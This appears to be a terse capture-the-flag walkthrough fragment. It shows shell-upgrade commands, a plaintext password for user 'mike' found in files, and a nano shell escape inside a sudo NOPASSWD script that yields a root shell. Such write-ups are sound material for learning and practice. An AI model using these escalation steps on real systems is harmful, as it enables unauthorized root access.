python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
We found a list of passwords from mike in a file called accounts and another password in history
Victim
su mike
Password: b3stpassw0rdbr0xx
Privilege Escalation
mike is able to run a script with NOPASSWD, looking at the script it, there are a few options to select. One option is to run nano which we can use to get sudo. I also noticed my terminal would not open nano so I exported xterm
Victim
sudo -l
export TERM="xterm"
Victim
sudo /bin/bash /opt/rootkit.sh
^R^X
reset; sh 1>&0 2>&0